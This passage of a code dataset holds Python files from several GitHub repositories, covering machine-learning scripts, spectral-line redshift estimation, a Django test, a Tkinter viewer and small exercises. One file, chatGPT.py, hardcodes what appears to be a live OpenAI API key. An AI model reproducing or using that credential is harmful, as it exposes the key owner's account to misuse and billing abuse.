time()-t1)\n\nprint(accuracy_score(labels_test, predrbf))\n\nprint(len(predrbf[predrbf == 1]))\n\n\n","repo_name":"sharad-vm/ML-Enron-Data","sub_path":"SVM/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4204376244","text":"import argparse\nimport torch\nimport numpy as np\nfrom utils import load_model_and_tokenizer\nfrom figures import create_bigram_histogram, create_position_boxplot\nfrom storage import get_summaries\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Script to product Replication Figures 1 and 2\"\n )\n\n parser.add_argument(\n \"--model\",\n type=str,\n required=True,\n choices=[\n \"pegasus-cnn_dailymail\",\n \"pegasus-xsum\",\n \"bart-large-cnn\",\n \"bart-large-xsum\",\n ],\n help=\"choose the model\",\n )\n\n args = parser.parse_args()\n\n model, tokenizer = load_model_and_tokenizer(args.model)\n\n summaries = get_summaries(args.model, model.config.name_or_path)\n\n # Existing Bigram means the bigram just generated occurs in the input document,\n # while a NovelBigram is an organic model generation.\n bigram_entropies = {\"existing\": [], \"novel\": []}\n # Prediction entropy values by relative sentence positions.\n # For example, 0.0 indicates the first 10% of tokens in a sentence, and 0.9 is the last 10% of tokens.\n position_entropies = {key: [] for key in np.round(np.linspace(0, 0.9, 10), 1)}\n\n for key, value in summaries.items():\n entropies = value[\"metadata\"][\"entropy\"]\n bigram_source = value[\"metadata\"][\"bigrams_in_input\"]\n sentence_position = value[\"metadata\"][\"sentence_position\"]\n for ind, e in enumerate(entropies):\n if bigram_source[ind]:\n bigram_entropies[\"existing\"].append(e)\n else:\n bigram_entropies[\"novel\"].append(e)\n position_entropies[sentence_position[ind]].append(e)\n\n create_bigram_histogram(bigram_entropies, args.model)\n create_position_boxplot(position_entropies, args.model)\n","repo_name":"vincehartman38/Replication-of-Transformer-Uncertainty","sub_path":"entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"620478401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 8 15:23:15 2023\n\n@author: sebas\n\"\"\"\n\n\n \n \nimport openai\n\nopenai.api_key = \"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\"\n\n\nwhile True:\n \n prompt = input(\"\\nIntroduce una pregunta: \")\n \n if prompt == \"exit\":\n break\n \n completion = openai.Completion.create(engine=\"text-davinci-003\",\n prompt = prompt,\n max_tokens=2048)\n \n print(completion.choices[0].text)","repo_name":"SebastianAlzate96/Enzimas","sub_path":"chatGPT.py","file_name":"chatGPT.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73393107891","text":"from rest_framework.test import APIRequestFactory\n\nfrom one.tests.tests.cases import FastTenantTestCase as TestCase\nfrom one.users.api.views import UserViewSet\nfrom one.users.models import User\nfrom tests.cases import FastTenantTestCase as TestCase\n\n\nclass TestUserViewSet(TestCase):\n def setUp(self):\n super().setUp() # required\n self.user = User.objects.create_user(username=\"test\", password=\"test\")\n self.api_rf = APIRequestFactory()\n\n def test_get_queryset(self):\n view = UserViewSet()\n request = self.api_rf.get(\"/fake-url/\")\n request.user = self.user\n\n view.request = request\n\n assert self.user in view.get_queryset()\n\n def test_me(self):\n view = UserViewSet()\n request = self.api_rf.get(\"/fake-url/\")\n request.user = self.user\n\n view.request = request\n\n response = view.me(request) # type: ignore\n\n assert response.data == {\n \"username\": self.user.username,\n \"url\": f\"http://testserver/api/users/{self.user.username}/\",\n \"name\": self.user.name,\n }\n","repo_name":"riso-tech/django-saas","sub_path":"one/users/tests/test_drf_views.py","file_name":"test_drf_views.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"30174566980","text":"import os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nfrom mir_help import *\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\n# Set video capture from 2nd webcam\ncap = cv2.VideoCapture(1)\n\n# Record webcam activity\ncodec = cv2.VideoWriter_fourcc('D','I','V','X')\nvideoFile = cv2.VideoWriter();\nsize = (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\nvideoFile = cv2.VideoWriter();\nvideoFile.open('video.avi', codec, 10, size, 1)\n\nsys.path.append(\"..\")\n\n# Model trained with custom data\nMODEL_NAME = 'mir_graph'\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('training', 'object-detection.pbtxt')\nNUM_CLASSES = 23\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\n\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n\n# Detection\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n while True:\n # Start Camera, while true, camera will run\n ret, image_np = cap.read()\n\n # Set height and width of webcam\n height = 720\n width = 1280\n\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n\n # Detection equivalent to predict, will return confidence scores, classes,\n # box dimensions (ymin, xmin, ymax, xmax) & num of detection\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=5)\n\n # Obtain classes and coordinates (xmin) as a list of tuples\n od_list = [[category_index.get(value).get('name'), boxes[0][index][1] * width] for index,\n value in enumerate(classes[0]) if scores[0, index] > 0.65]\n\n # Reorder the tuples by their xmin coordinates\n od_list_seq = sorted(od_list, key=lambda x:(-x[1], x[0]), reverse=True)\n\n # Return only the classes from the tuples\n od_list_co = [seq[0] for seq in od_list_seq]\n\n # Convert labels into math operators\n od_list_co = convop(od_list_co)\n\n # Combine intergers between operators\n co_num_list = combint(od_list_co)\n\n # Convert all numbers into floats if list contains a division\n exp_result = chkfl(co_num_list)\n\n # Solve math expression and return result\n result = getresult(co_num_list, exp_result)\n\n # Convert math expression and result into a string\n if str(result) == '...':\n obj = str(exp_result)\n else:\n obj = str(exp_result) + ' is ' + str(result)\n\n # Set font, print math expression and result\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(image_np, obj, (150, 1000), font, 3, (0, 0, 0), 0, cv2.LINE_AA)\n\n # Record Video\n videoFile.write(image_np)\n\n # Set camera resolution and create a break function by pressing 'q'\n cv2.imshow('object detection', cv2.resize(image_np, (width, height)))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cap.release()\n videoFile.release()\n cv2.destroyAllWindows()\n break\n","repo_name":"stevenobadja/math_object_detection","sub_path":"mir.py","file_name":"mir.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"3111945727","text":"from View.Shared import SetUpWindow\nfrom Controller.Analysis import *\n\n\ndef ShowInfo(version, pes, refs, atoms, numTests, rank, showPosPlot, showPesPlot, numPoints):\n if numTests >= numPoints:\n numTests = '> {}'.format(numPoints)\n elif numTests == 0:\n numTests = 'not recorded.'\n imageHolders = []\n\n window = tk.Toplevel()\n SetUpWindow(window)\n\n # Title\n Label(window, text='Result #{num} for elements {elements} Potential energy = {energy} eV'.format(num=rank+1, elements=atoms, energy=version[1]),\n font=('Agency FB', 16), fg='white', bg='#222222').pack(pady=5)\n\n # Set up grid\n topGrid = Frame(window)\n SetColours(topGrid)\n sizex, sizey = 200, 170\n\n Label(topGrid, text='Geometric structure', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=0, padx='5')\n Label(topGrid, text='Rotated', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=1, padx='5')\n Label(topGrid, text='Positions tested', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=3, padx='5')\n\n # Show the structure.\n imageHolders.append(PhotoImage(file=\"Images/structure{num}.png\".format(num=rank)))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey, bg=\"#222222\")\n canvas.grid(row=1, column=0, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n # Show the rotated structure.\n imageHolders.append(PhotoImage(file=\"Images/structure{num}rotated.png\".format(num=rank)))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey, bg=\"#222222\")\n canvas.grid(row=1, column=1, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n # Show the stats for this version of the molecule.\n bestInfoBox = Text(topGrid, fg='#EEFFEE', bg=\"#222222\", width=\"20\", height=\"10\")\n bestInfoBox.grid(row=1, column=2, columnspan=1, padx='5')\n\n if showPosPlot is True:\n imageHolders.append(PhotoImage(file=\"Images/positions{num}.png\".format(num=rank)))\n else:\n imageHolders.append(PhotoImage(file=\"Images/noPlot0.png\"))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey)\n canvas.grid(row=1, column=3, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n Label(topGrid, text='Configurations tested: {}\\n(limited to show max {})'.format(numTests, numPoints), fg='#EEFFEE', bg='#222222') \\\n .grid(row=1, column=4, columnspan=1, padx='5')\n\n topGrid.pack()\n\n GetBestInfo(rank, bestInfoBox)\n\n # Set up bottom grid\n bottomGrid = Frame(window)\n SetColours(bottomGrid)\n sizex, sizey = 400, 340\n\n Label(bottomGrid, text='Potential energy surfaces found', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=0, columnspan=4, padx='5')\n\n # Show info for the PES plot.\n pesInfoBox = Text(bottomGrid, fg='#EEFFEE', bg=\"#222222\", width=\"46\", height=\"18\")\n pesInfoBox.grid(row=1, column=0, columnspan=2, padx='5')\n\n if showPesPlot is True:\n pesData = np.array(pes)\n # Make a larger copy of the PES for a clearer view.\n SurfacePlot(pesData, refs, 3.5, rank)\n imageHolders.append(PhotoImage(file=\"Images/pes{num}.png\".format(num=rank)))\n SurfaceInfo(pesInfoBox)\n # Show a legend for the PES plot.\n legend = Text(bottomGrid, fg='#EEFFEE', bg=\"#222222\", width=\"6\", height=\"18\")\n legend.grid(row=1, column=3, columnspan=1, padx='5')\n bottomGrid.pack()\n SurfaceLegend(legend, refs)\n else:\n imageHolders.append(PhotoImage(file=\"Images/noPlot0.png\"))\n pesInfoBox.insert(END, \"Potential energy surface\\ndata not recorded.\")\n bottomGrid.pack()\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(bottomGrid, width=sizex, height=sizey)\n canvas.grid(row=1, column=2, padx='5')\n canvas.create_image(sizex/2, sizey/2, image=thisImage)\n\n window.mainloop()\n","repo_name":"Sophie-Turner/GeOpt","sub_path":"Geopt/View/Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42409833017","text":"import random\nimport numpy as np\n\nfrom keras.utils import np_utils\n\n\ndef transform(X_train, y_train, X_val, y_val, nb_classes):\n if type(X_train) is list:\n c = list(zip(X_train, y_train))\n random.shuffle(c)\n X_train, y_train = zip(*c)\n\n c = list(zip(X_val, y_val))\n random.shuffle(c)\n X_val, y_val = zip(*c)\n\n elif type(X_train) is np.ndarray:\n indices = np.random.permutation(X_train.shape[0])\n X_train = X_train[indices]\n y_train = y_train[indices]\n\n indices = np.random.permutation(X_val.shape[0])\n X_val = X_val[indices]\n y_val = y_val[indices]\n\n # random.shuffle(X_train_source)\n # random.shuffle(X_val_source)\n\n # Convert class vectors to binary class matrices.\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_val = np_utils.to_categorical(y_val, nb_classes)\n\n return X_train, Y_train, X_val, Y_val\n","repo_name":"qichenglao/DeepOrg","sub_path":"DeepOrg/helpers/data_transformer.py","file_name":"data_transformer.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27440886850","text":"from typing import Optional, Union\nimport numpy as np\nfrom scipy.stats import median_abs_deviation\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks_cwt\n\nfrom astropy.modeling import Fittable1DModel, Parameter\n\n# Some important lines with corresponding wavelenghts in Angstrom\nRESTFRAME_LINES = [\n (10320, '[SII]', 'E'),\n (8863.0, 'TiO', 'A'),\n (8430.0, 'TiO', 'A'),\n (8195.0, 'NaI', 'A'),\n (8183.0, 'NaI', 'A'),\n (7590.0, 'TiO', 'A'),\n (7065.2, 'HeI', 'AE'),\n (6725.0, '[SII]', 'E'),\n (6562.8, 'Halpha', 'AEB'),\n (6159.0, 'TiO', 'A'),\n (5892.5, 'NaD', 'A'),\n (5603.0, 'TiO', 'A'),\n (5269.0, 'Ca,Fe', 'A'),\n (5175.4, 'MgI', 'A'),\n (5006.8, '[OIII]', 'E'),\n (4958.9, '[OIII]', 'E'),\n (4861.3, 'Hbeta', 'AEB'),\n (4340.4, 'Hgamma', 'AE'),\n (4304.4, 'Gband', 'A'),\n (4216.0, 'CN', 'A'),\n (4101.7, 'Hdelta', 'AE'),\n (4000.0, 'Balmer_Break', 'Break'),\n (4072.0, '[SII]', 'E'),\n (3968.5, 'CaII_H', 'A'),\n (3933.7, 'CaII_K', 'A'),\n (3889.1, 'Hksi,CN(H8)', 'AE'),\n (3869.0, '[NeIII]', 'E'),\n (3797.9, 'Hteta', 'AE'),\n (3770.6, 'H11', 'AE'),\n (3727.5, '[OII]', 'E'),\n (3581.0, 'FeI', 'A'),\n (3425.8, '[NeV]', 'E'),\n (3345.9, '[NeV]', 'E'),\n (2964.0, 'FeII_bump', 'E'),\n (2799.0, 'MgII', 'AEB'),\n (2626.0, 'FeII', 'E'),\n (2600.0, 'FeII', 'A'),\n (2586.7, 'FeII', 'A'),\n (2382.0, 'FeII', 'A'),\n (2374.0, 'FeII', 'A'),\n (2344.2, 'FeII', 'A'),\n (2260.0, 'FeII', 'A'),\n (2142.0, '[NII]', 'E'),\n (1909.0, '[CIII]', 'EB'),\n (1856.0, 'AlIII', 'A'),\n (1670.8, 'AlII', 'A'),\n (1666.1497, 'OIII]', 'E'),\n (1640.0, 'HeII', 'AE'),\n (1608.5, 'FeII', 'A'),\n (1660.8092, 'OIII]', 'E'),\n (1549.0, 'CIV', 'AEB'),\n (1526.7, 'SiII', 'A'),\n (1397.0, 'SiIV+OIV', 'AEB'),\n (1334.5, 'CII', 'AE'),\n (1303.0, 'OI', 'AE'),\n (1260.4, 'SiII', 'A'),\n (1240.0, 'NV', 'AE'),\n (1215.7, 'LyA', 'AEB'),\n (1033.0, 'OVI', 'AE'),\n (1025.6, 'LyB', 'AE'),\n (972.5, 'LyG', 'AE'),\n]\n\n\ndef _normal(x, mu, sigma):\n return np.exp(-((x - mu)**2)/(2*sigma)) / (sigma * np.sqrt(2 * np.pi))\n\n\nclass Emission1D(Fittable1DModel):\n \"\"\"Simple model for a flat spectrum with emission lines.\"\"\"\n\n redshift = Parameter()\n\n def __init__(self, lines_identifications, sigma=3, redshift=0, **kwargs):\n self.line_candidates = lines_identifications\n self.sigma = sigma\n super().__init__(redshift=redshift, **kwargs)\n\n def evaluate(self, lam, redshift):\n \"\"\"\n Evaluate the model.\n\n Parameters\n ----------\n lam : np.ndarray\n Array of wavelength.\n redshift : float, optional\n The redshift of the spectrum.\n The default value is 0.\n\n Returns\n -------\n result : np.ndarray\n The model values.\n\n \"\"\"\n result = np.zeros_like(lam)\n for candidate in self.line_candidates:\n mu = candidate[1] / (1 + redshift)\n result += _normal(lam, mu, self.sigma) * candidate[3]\n return result\n\n\ndef get_lines(name=None, line_type=None, wrange=None, z=0):\n \"\"\"\n Return line data according to the given line name and types.\n\n Parameters\n ----------\n name : str or None, optional\n The name of the line (eg. CaII_H or FeI, etc...). If None, the lines\n are selected only by type. If both name and type are None, all lines\n are returned.\n line_type : str or None, optional\n Type of the line, can be 'A' (absorption), 'E' (emission) 'B' (Broad).\n If None, then all the line types are returned.\n The default is None.\n wrange : tuple/list/np.ndarray of floats or None, optional\n The wavelength ragne in which lines should be. If None, no selection\n according to the line wavelenght is made.\n The default is None.\n z : float, optional\n The redshit of the lines. The default value is 0.\n\n Returns\n -------\n selected_lines : list\n List of line data. Each element of the list is a 3-tuple in the form\n (wavelenght in Angstrom, Line name, Line type).\n\n \"\"\"\n if name is None:\n selected_lines = RESTFRAME_LINES[:]\n else:\n selected_lines = [\n line\n for line in RESTFRAME_LINES\n if name.lower() == line[1].lower()\n ]\n if line_type is not None:\n selected_lines = [\n line\n for line in selected_lines\n if line_type.lower() in line[2].lower()\n ]\n\n selected_lines = [\n ((1 + z) * line[0], line[1], line[2])\n for line in selected_lines\n ]\n\n if wrange is not None:\n w_min = np.nanmin(wrange)\n w_max = np.nanmax(wrange)\n selected_lines = [\n line\n for line in selected_lines\n if w_min <= line[0] <= w_max\n ]\n\n return selected_lines\n\n\ndef get_spectrum_lines(\n wavelengths: np.ndarray,\n flux: np.ndarray,\n var: Optional[np.ndarray] = None,\n sigma_threshold: Optional[float] = 10.0,\n smoothing_window: Optional[int] = 51,\n smoothing_order: Optional[int] = 1,\n glob_smoothing: Optional[int] = 3):\n \"\"\"\n Identify the position of clear emission or absorption lines.\n\n Parameters\n ----------\n wavelengths : np.ndarray\n The wavelengs corresponding to each flux value.\n flux : numpy.ndarray\n The spectrum itself.\n var : numpy.ndarray, optional\n The variance of the spectrum itself.\n The default value is None.\n sigma_threshold : float, optional\n The threshold to use for line identification.\n The default value is 5.0\n smoothing_window : int, optional\n Parameter to be passed to the smoothing function.\n The default value is 51.\n smoothing_order : int, optional\n Parameter to be passed to the smoothing function.\n The default value is 11.\n glob_smoothing : int, optional\n Parameter used for line identification.\n The default value is 3\n\n Returns\n -------\n identifications : list\n A list of tuple. Each tuple ha the form of (k, w, l, h) and contains\n the index k for the wavelenght w of the line, the approximate max width\n l of the line and a height h of the line. Note that l and h are not\n actual phisical quantities and should be used with caution when\n comparing to other value from a different spectrum.\n \"\"\"\n if np.isnan(flux).all():\n return np.nan\n else:\n flux = savgol_filter(flux.copy(), glob_smoothing, 1)\n flux = np.ma.array(flux, mask=np.isnan(flux))\n\n if var is not None:\n var = np.ma.array(var.copy(), mask=np.isnan(var))\n else:\n var = 1.0\n\n smoothed_spec = savgol_filter(flux, smoothing_window, smoothing_order)\n smoothed_spec = np.ma.array(smoothed_spec, mask=np.isnan(smoothed_spec))\n\n # Subtract the smoothed spectrum to the spectrum itself to get a\n # crude estimation of the noise, then square it and divide for the variance\n # and then go back with a square root\n norm_noise = ((flux - smoothed_spec)**2) / var\n norm_noise = np.ma.sqrt(norm_noise)\n\n # Get the median value of the noise. The median is more robust against the\n # presence of lines with respect to the mean\n noise_median = np.ma.median(norm_noise)\n\n # Get the NMAD of the noise. We assume here that the noise has a\n # unimodal distribution (eg. gaussian like), and this is a good assumption\n # if the noise is due only to the random fluctuations\n noise_nmad = median_abs_deviation(norm_noise, scale='normal')\n\n norm_noise_deb = np.abs(norm_noise - noise_median)\n\n # Get the possible lines\n outlier = norm_noise_deb >= (sigma_threshold * noise_nmad)\n\n # Delete identification with lenght 1 (almost all are fake)\n for k, v in enumerate(outlier):\n if (k == 0) or (k == len(outlier)-1):\n continue\n if v and ((outlier[k-1] == 0) and (outlier[k+1] == 0)):\n outlier[k] = 0\n\n # Merge almost contiguos identifications\n for k in range(1, glob_smoothing+1):\n outlier[k:] += outlier[:-k]\n outlier[:-k] += outlier[k:]\n\n # Get position, width and height of the identifications\n identifications = []\n c_start = None\n c_wstart = None\n c_end = None\n for k, v in enumerate(outlier):\n if v:\n if c_start is None:\n c_start = k\n c_wstart = wavelengths[k]\n c_end = None\n elif c_start is not None:\n if c_end is None:\n c_end = k\n c_wh = np.ma.max(norm_noise_deb[c_start: c_end])\n c_wh /= noise_nmad\n c_max_pos = np.ma.argmax(norm_noise_deb[c_start: c_end])\n c_pos_idx = c_start + c_max_pos\n c_wpos = wavelengths[c_pos_idx]\n c_wlen = wavelengths[k] - c_wstart\n identifications.append((c_pos_idx, c_wpos, c_wlen, c_wh))\n c_start = None\n\n # Sortin by height\n identifications.sort(key=lambda a: a[3])\n return identifications\n\n\ndef get_redshift_from_lines(identifications: Union[tuple, list, np.array],\n z_max: Optional[float] = 6,\n z_min: Optional[float] = 0,\n z_points: Optional[Union[float, None]] = None,\n tol: Optional[float] = None):\n \"\"\"\n Get the redshift of a set of line identifications.\n\n Parameters\n ----------\n identifications : Union[tuple, list, np.array]\n A list of identification generated by get_spectrum_lines().\n z_max : Optional[float], optional\n The maximum redshift. The default is 6.\n z_min : Optional[float], optional\n The minimum redshift. The default is 0.\n z_points : Optional[Union[float, None]], optional\n Number of redshift values between z_min and z_max to test.\n If None, then z_points = 1000*(z_max - z_min).\n The default is None.\n tol : Optional[float], optional\n The tolerance. If None, it is computed automatically.\n The default is None.\n\n Returns\n -------\n z_values\n Best estimations of the redshift sorted from the most probable to the\n least probable.\n z_probs\n Pseudo-probabilities of the redshift estimations (the higer the better)\n \"\"\"\n if len(identifications) < 2:\n return None\n\n if z_points is None:\n z_points = 1000 * (z_max - z_min)\n\n if tol is None:\n tol = np.mean([x[2] for x in identifications])\n\n mymodel = Emission1D(identifications, tol, redshift=0)\n\n z_values = np.linspace(z_min, z_max, z_points)\n prob_values = np.zeros_like(z_values)\n for j, z in enumerate(z_values):\n rest_lines_lam = [\n x[0] for x in get_lines(z=z)\n ]\n\n prob_values[j] = np.sum(mymodel(rest_lines_lam))\n\n peak_indices = find_peaks_cwt(prob_values, 1)\n z_values_p = z_values[peak_indices]\n z_prob_p = prob_values[peak_indices]\n\n z_prob_p_sorted_ind = np.argsort(z_prob_p)[::-1]\n z_values_p = z_values_p[z_prob_p_sorted_ind]\n z_prob_p = z_prob_p[z_prob_p_sorted_ind]\n\n mean_prob = np.median(z_prob_p)\n std_prob = np.std(z_prob_p)\n\n plausible_mask = z_prob_p >= mean_prob + std_prob\n\n return (z_values_p[plausible_mask], z_prob_p[plausible_mask])\n","repo_name":"mauritiusdadd/python-specex","sub_path":"src/specex/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":11455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13047667765","text":"from cavachon.distributions.Distribution import Distribution\r\nfrom typing import Mapping, Union\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_probability as tfp\r\n\r\nclass IndependentZeroInflatedNegativeBinomial(Distribution, tfp.distributions.Mixture):\r\n \"\"\"IndependentZeroInflatedNegativeBinomial\r\n \r\n Distribution for independent zero-inflated negative binomial.\r\n \r\n \"\"\"\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n return\r\n \r\n @classmethod\r\n def from_parameterizer_output(\r\n cls,\r\n params: Union[tf.Tensor, Mapping[str, tf.Tensor]],\r\n **kwargs):\r\n \"\"\"Create independent zero-inflated negative binomial distributions \r\n from the outputs of\r\n modules.parameterizers.IndependentZeroInflatedNegativeBinomial\r\n\r\n Parameters\r\n ----------\r\n params: Union[tf.Tensor, Mapping[str, tf.Tensor]]\r\n Parameters for the distribution created by parameterizers. \r\n Alternatively, a mapping of tf.Tensor with parameter name as \r\n keys can be provided. If provided with a tf.Tensor. The last \r\n dimension needs to be a multiple of 3, and:\r\n 1. params[..., 0:p] will be used as the logits. \r\n 2. params[..., p:2*p] will be used as the mean.\r\n 3. params[..., 2*p:3*p] will be used as the dispersion.\r\n If provided with a Mapping, 'logits', 'mean', 'dispersion' \r\n should be in the keys of the Mapping. Note that in both cases:\r\n 1. The batch_shape should be the same as [..., p]. \r\n 2. The event_shape should be []. \r\n\r\n Returns\r\n -------\r\n tfp.distributions.Distribution\r\n Created Tensorflow Probability Zero-inflated Negative Binomial\r\n Distribution.\r\n \r\n \"\"\"\r\n\r\n if isinstance(params, tf.Tensor):\r\n logits, mean, dispersion = tf.split(params, 3, axis=-1)\r\n elif isinstance(params, Mapping):\r\n logits = params.get('logits')\r\n mean = params.get('mean')\r\n dispersion = params.get('dispersion')\r\n \r\n probs = tf.math.sigmoid(logits)\r\n probs = tf.stack([probs, 1 - probs], axis=-1)\r\n\r\n # batch_shape: (batch, ), event_shape: (event_dims, )\r\n return cls(\r\n cat=tfp.distributions.Categorical(probs=probs),\r\n components=(\r\n tfp.distributions.NegativeBinomial.experimental_from_mean_dispersion(\r\n 1e-7 * tf.ones_like(mean),\r\n dispersion),\r\n tfp.distributions.NegativeBinomial.experimental_from_mean_dispersion(\r\n mean,\r\n dispersion)),\r\n **kwargs)","repo_name":"dn070017/CAVACHON","sub_path":"cavachon/distributions/IndependentZeroInflatedNegativeBinomial.py","file_name":"IndependentZeroInflatedNegativeBinomial.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16602866004","text":"import codes\r\nimport os\r\nimport time\r\n#Aici ai switch-ul, pentru fiecare obtiune apelez functia, iar la search deschid un alt switch\r\ndef switch(lines,matrix,new_lines):\r\n while True:\r\n print(\"Type 'read' to read the matrix.\")\r\n print(\"Type 'print' to print the matrix.\")\r\n print(\"Type 'add' to add 2 matrices.\")\r\n print(\"Type 'acces' to acces an item.\")\r\n print(\"Type 'search' to open the search menue.\")\r\n print(\"Type 'multiply' to multiply 2 matrices\")\r\n print(\"Type 'compare' to lexicographically compare 2 matrices\")\r\n print(\"Type anything else to exit.\")\r\n action = input(': ')\r\n if \"read\" in action:\r\n codes.read_matrix(lines, matrix)\r\n elif \"print\" in action:\r\n codes.print_matrix(lines, matrix)\r\n elif \"add\" in action:\r\n print(\"Note, if the matrices are diferent size the program won't return an error, rather it will compute the matrices eitherway\")\r\n time.sleep(3)\r\n matrix=codes.matrix_addition(lines,matrix,new_lines)\r\n lines = int(new_lines[0])\r\n elif \"acces\" in action:\r\n codes.access_item(lines,matrix)\r\n elif \"multiply\" in action:\r\n matrix=codes.matrix_multiplication(lines,matrix,new_lines)\r\n lines = int(new_lines[0])\r\n elif \"search\" in action:\r\n while True:\r\n print(\"Type 'first' to search the first aparition of the string.\")\r\n print(\"Type 'all' to search all the aparitions of the string.\")\r\n print(\"Type 'last' to search for the last aparition of the string.\")\r\n print(\"Type anything else to exit.\")\r\n action_2=input(': ')\r\n if \"first\" in action_2:\r\n codes.search_item_1st(matrix,lines)\r\n elif \"all\" in action_2:\r\n codes.search_item_all(matrix,lines)\r\n elif \"last\" in action_2:\r\n codes.search_item_last(matrix,lines)\r\n else:\r\n break\r\n time.sleep(2)\r\n os.system('cls')\r\n elif \"compare\" in action:\r\n codes.lex_copare(lines,matrix)\r\n else:\r\n break\r\n input('Press enter to continue...')\r\n os.system('cls')","repo_name":"DonCo007/Matrice_caractere","sub_path":"Prob 6/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2317483730","text":"# Author: JD 01/12/2022\n\ndef tem_conv():\n while True:\n try: \n temp = float(input(\"Enter the temperature: \"))\n type = input(\"Convert it into?(f/c)\").upper()\n if type == \"C\":\n result = (temp - 32) * 5 / 9\n print(\"The temperature in celsius is {0}.\".format(result))\n elif type == \"F\":\n result = temp / 5 * 9 + 32\n print(\"The temperature in celsius is {0}.\".format(result))\n else:\n print(\"Invalid input, enter either f to transfer it into fahrenheir and c for celsius.\")\n except ValueError:\n print(\"Invalid input, enter a numerical value for the temperature\")\n\n\ntem_conv()","repo_name":"fp-computer-programming/hw-9-3-p22jdiao","sub_path":"hw9-3-1.py","file_name":"hw9-3-1.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 